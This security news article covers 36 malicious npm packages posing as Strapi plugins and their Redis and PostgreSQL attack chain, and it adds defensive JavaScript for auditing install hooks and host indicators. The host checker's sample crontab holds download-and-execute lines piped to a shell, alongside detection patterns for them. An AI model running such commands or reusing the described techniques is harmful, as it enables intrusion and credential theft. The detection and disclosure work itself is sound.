36 Malicious npm Packages Exploit Redis and PostgreSQL to Deploy Persistent Implants
Recent cybersecurity investigations have unveiled a significant threat within the npm registry, where 36 malicious packages masquerading as Strapi CMS plugins have been discovered. These packages are designed to exploit vulnerabilities in Redis and PostgreSQL, deploy reverse shells, harvest credentials, and establish persistent implants on compromised systems.
Overview of the Threat
Each of the malicious packages contains three files: package.json, index.js, and postinstall.js. Notably, they lack descriptions, repositories, or homepages, and they use version 3.6.8 to mimic legitimate Strapi v3 community plugins. According to SafeDep, the packages are crafted to deceive developers into downloading them by adopting a naming convention that begins with “strapi-plugin-” followed by terms like “cron,” “database,” or “server.” In contrast, official Strapi plugins are properly scoped under “@strapi/.”
The packages were uploaded by four sock puppet accounts—“umarbek1233,” “kekylf12,” “tikeqemif26,” and “umar_bektembiev1”—within a span of just 13 hours. The complete list of malicious packages includes:
- strapi-plugin-cron
- strapi-plugin-config
- strapi-plugin-server
- strapi-plugin-database
- strapi-plugin-core
- strapi-plugin-hooks
- strapi-plugin-monitor
- strapi-plugin-events
- strapi-plugin-logger
- strapi-plugin-health
- strapi-plugin-sync
- strapi-plugin-seed
- strapi-plugin-locale
- strapi-plugin-form
- strapi-plugin-notify
- strapi-plugin-api
- strapi-plugin-sitemap-gen
- strapi-plugin-nordica-tools
- strapi-plugin-nordica-sync
- strapi-plugin-nordica-cms
- strapi-plugin-nordica-api
- strapi-plugin-nordica-recon
- strapi-plugin-nordica-stage
- strapi-plugin-nordica-vhost
- strapi-plugin-nordica-deep
- strapi-plugin-nordica-lite
- strapi-plugin-nordica
- strapi-plugin-finseven
- strapi-plugin-hextest
- strapi-plugin-cms-tools
- strapi-plugin-content-sync
- strapi-plugin-debug-tools
- strapi-plugin-health-check
- strapi-plugin-guardarian-ext
- strapi-plugin-advanced-uuid
- strapi-plugin-blurhash
Technical Analysis of the Malicious Code
The analysis indicates that the malicious code lives in the postinstall script hook, which npm runs automatically during npm install with no user interaction. It executes with the privileges of the installing user, which in CI/CD environments and Docker containers is frequently root.
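The two traits described so far (an unscoped “strapi-plugin-” name with no description, repository or homepage, and an install-time lifecycle script) are both visible in a package's manifest before anything runs. The following pre-install audit is an added example written for this article, not code from SafeDep or the reporting source; the sample manifests are constructed, and the field names it inspects are the standard package.json fields.

```javascript
// Added example (not from SafeDep or the article): audit npm manifests for the
// traits described above. Sample manifests below are constructed for illustration.

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Official Strapi plugins are scoped under @strapi/, so an unscoped name that
// starts with "strapi-plugin-" is not proof of malice on its own, but together
// with missing metadata and an install hook it is a strong signal.
function auditManifest(pkg) {
  const findings = [];
  const name = pkg.name || '';
  const scripts = pkg.scripts || {};

  if (name.startsWith('strapi-plugin-')) {
    findings.push('unscoped strapi-plugin-* name');
  }
  if (!pkg.description && !pkg.repository && !pkg.homepage) {
    findings.push('no description, repository or homepage');
  }
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push(`runs "${hook}" script: ${scripts[hook]}`);
    }
  }
  return { name, version: pkg.version, findings };
}

// Audit a list of manifests and return only the ones with findings,
// noisiest package first.
function auditAll(manifests) {
  return manifests
    .map(auditManifest)
    .filter((r) => r.findings.length > 0)
    .sort((a, b) => b.findings.length - a.findings.length);
}

// Constructed sample manifests (not the real package contents).
const SAMPLE_MANIFESTS = [
  {
    name: 'strapi-plugin-cron', // name taken from the campaign's list
    version: '3.6.8',
    scripts: { postinstall: 'node postinstall.js' },
  },
  {
    name: '@strapi/plugin-i18n', // properly scoped, with metadata
    version: '4.0.0',
    description: 'Internationalization plugin',
    repository: 'https://github.com/strapi/strapi',
  },
  {
    name: 'left-pad-example', // unrelated package with a build hook
    version: '1.0.0',
    description: 'example',
    scripts: { prepare: 'npm run build' },
  },
];

const AUDIT_REPORT = auditAll(SAMPLE_MANIFESTS);
for (const r of AUDIT_REPORT) {
  console.log(`${r.name}@${r.version}`);
  for (const f of r.findings) console.log(`  - ${f}`);
}
```

In real use the manifests come from the lockfile or from each package's package.json under node_modules after a dry-run install. Independently of this check, npm's `--ignore-scripts` flag (or `ignore-scripts=true` in .npmrc) stops lifecycle hooks from running at all, which removes the execution vector the campaign relied on; packages that genuinely need a build step can then be allowed one at a time.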
The evolution of the payloads associated with this campaign reveals a systematic approach to exploitation:
- Redis Exploitation: The initial phase involves weaponizing a locally accessible Redis instance for remote code execution. This is achieved by injecting a crontab entry that downloads and executes a shell script from a remote server every minute. The script writes a PHP web shell and Node.js reverse shell to Strapi’s public uploads directory and scans for sensitive data, including Elasticsearch and cryptocurrency wallet seed phrases.
- Docker Container Escape: The attackers combine Redis exploitation with Docker container escape techniques to write shell payloads to the host system. This phase also includes launching a direct Python reverse shell on port 4444.
- Credential Harvesting: The payloads are designed to scan the system for environment variables and PostgreSQL database connection strings. They gather environment dumps, Strapi configurations, and Redis database information by executing commands like INFO, DBSIZE, and KEYS.
- Database Exploitation: The attackers utilize hard-coded credentials to connect to the target’s PostgreSQL database, querying Strapi-specific tables for sensitive information. This includes extracting cryptocurrency-related data and attempting to connect to multiple Guardarian databases.
- Persistent Access: The final phase involves deploying a persistent implant to maintain remote access to a specific hostname, along with facilitating credential theft by scanning hard-coded paths.
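Two of the artifacts in the chain above leave host-side traces that are cheap to check for: an every-minute crontab entry that fetches and executes a remote script, and script files written into Strapi’s public uploads directory. The checks below are an added example written for this article, not code from SafeDep or the reporting source; the crontab text and file listing are constructed, and 203.0.113.10 is a documentation address rather than an indicator from the campaign.

```javascript
// Added example (not from SafeDep or the article): host-side checks for two
// of the indicators described above, run here on constructed sample data.
// In real use, feed it the output of `crontab -l` (plus /etc/cron.d files)
// and a listing of Strapi's public/uploads directory.

// Every-minute schedule: all five cron fields are "*" or "*/1".
const EVERY_MINUTE = /^(\*|\*\/1)(\s+(\*|\*\/1)){4}\s+/;
// A network fetch whose result is handed to a shell, piped or chained.
const FETCH_TO_SHELL = /\b(curl|wget)\b.*(\|\s*|&&\s*)(ba)?sh\b/;

// Return crontab lines that run every minute and download-and-execute.
function findSuspiciousCron(crontabText) {
  return crontabText
    .split('\n')
    .map((line) => line.trim())
    .filter((line) => line && !line.startsWith('#'))
    .filter((line) => EVERY_MINUTE.test(line) && FETCH_TO_SHELL.test(line));
}

// Script file types that should not sit in a directory the web server
// serves as static uploads (the article describes PHP and Node.js shells
// being dropped there).
const SCRIPT_EXTENSIONS = new Set(['.php', '.phtml', '.js', '.sh', '.py']);

// Return the paths under uploadsDir whose extension is a script type.
function findExecutableUploads(paths, uploadsDir = 'public/uploads') {
  const prefix = uploadsDir.replace(/\/+$/, '') + '/';
  return paths.filter((p) => {
    if (!p.startsWith(prefix)) return false;
    const base = p.slice(p.lastIndexOf('/') + 1);
    const dot = base.lastIndexOf('.');
    return dot > 0 && SCRIPT_EXTENSIONS.has(base.slice(dot).toLowerCase());
  });
}

// Constructed sample crontab: two benign entries, two matching the pattern.
// 203.0.113.10 is a documentation address, not a real indicator.
const SAMPLE_CRONTAB = `
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://metrics.example.invalid/ping
* * * * * curl -s http://203.0.113.10/update.sh | sh
*/1 * * * * wget -qO- http://203.0.113.10/u.sh | bash
`;

// Constructed sample listing of a Strapi public directory.
const SAMPLE_PATHS = [
  'public/uploads/logo_a1b2c3.png',
  'public/uploads/brochure_2024.pdf',
  'public/uploads/thumbnail_d4e5f6.webp',
  'public/uploads/cache.php',
  'public/uploads/assets/worker.js',
  'public/robots.txt',
];

// Combine both checks into one report an operator can act on.
function scanHost(crontabText, paths) {
  return {
    cron: findSuspiciousCron(crontabText),
    uploads: findExecutableUploads(paths),
  };
}

const HOST_REPORT = scanHost(SAMPLE_CRONTAB, SAMPLE_PATHS);
for (const entry of HOST_REPORT.cron) console.log('suspicious cron:', entry);
for (const file of HOST_REPORT.uploads) console.log('script in uploads:', file);
```

A hit on either check on a host that installed one of the listed packages should be treated as confirmation of the compromise the article describes, not as a false positive to tune away. The Redis side of the chain is closed off by not exposing the instance to the container or network at all, or, where it must be reachable, by Redis's `protected-mode yes`, authentication, and binding to localhost, so that a local process cannot use it to write files such as crontabs.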
SafeDep noted that the progression of these payloads illustrates a clear narrative: the attackers began aggressively, pivoted to reconnaissance and data collection, and ultimately settled on maintaining persistent access while targeting credential theft.
Implications for the Cybersecurity Landscape
The nature of these payloads, particularly their focus on digital assets and the use of hard-coded credentials, suggests that this campaign may have been a targeted attack against cryptocurrency platforms. Users who have installed any of the identified packages are strongly advised to assume compromise and rotate all credentials.
This discovery aligns with a broader trend of supply chain attacks targeting the open-source ecosystem. Recent incidents include:
- A GitHub account named “ezmtebo” submitted over 256 pull requests across various open-source repositories, embedding credential exfiltration payloads that steal secrets through CI logs and PR comments.
- The hijacking of a verified GitHub organization, “dev-protocol,” to distribute malicious trading bots with typosquatted npm dependencies that steal wallet private keys and exfiltrate sensitive files.
- A compromise of the popular Emacs package, “kubernetes-el,” which exploited vulnerabilities in its GitHub Actions workflow to steal secrets and inject destructive code.
These incidents highlight the increasing sophistication of supply chain attacks, which have become a dominant force reshaping the global cyber threat landscape. As attackers target trusted vendors and open-source software, the potential for large-scale, cross-border impacts escalates.
Conclusion
The ongoing threat posed by malicious npm packages underscores the necessity for vigilance within the software development community. Package repositories such as npm and PyPI have become prime targets for attackers, who leverage stolen maintainer credentials and automated malware to compromise widely used libraries. This trend transforms development pipelines into distribution channels for malicious code, necessitating robust security measures and awareness among developers.
For further details on this evolving threat landscape, refer to the original reporting source: thehackernews.com.